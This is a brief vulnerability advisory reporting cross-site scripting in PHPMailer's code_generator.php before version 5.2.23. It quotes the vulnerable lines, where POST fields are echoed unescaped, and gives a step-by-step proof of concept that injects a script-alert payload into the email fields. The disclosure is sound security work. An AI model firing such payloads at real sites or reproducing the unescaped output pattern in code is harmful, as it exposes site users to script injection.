PHPMailer Cross Site Scripting

PHPMailer versions prior to 5.2.23 suffer from a cross site scripting vulnerability.


MD5 | 805a38cbb28d9f509ff048255eec6de7

[-] Title : PHPMailer < 5.2.23 - Cross-Site Scripting
[-] Author : Shahab Shamsi
[-] Software Link : https://github.com/PHPMailer/PHPMailer
[-] Version: [ 5.2.23 ]
[-] Tested on : [ Kali , Windows ]
[-] Category : Webapps
[-] Date : 2017-06-22


Vulnerable page :
/code_generator.php


Vulnerable Source :
312: echo $from_name;
18: $from_name = $_POST['From_Name'] : '';

313: echo $from_email;
19: $from_email = $_POST['From_Email'] : '';

314: echo $to_name;
20: $to_name = $_POST['To_Name'] : '';

315: echo $to_email;
21: $to_email = $_POST['To_Email'] : '';




POC :
http://localhost/code_generator.php

step 1 = Go To Web Page = http://localhost/code_generator.php

Step 2 = In the box : "From Email Address" AND "To Email Address"

Step 3 = input box , Add JavaScript Code : <script>alert('XSS')</script>



************************
* ==> Contact Me :
* Telegram : @Shahab_Shamsi
* Email : [email protected]
* WebSilte : WwW.iran123.Org
************************

Related Posts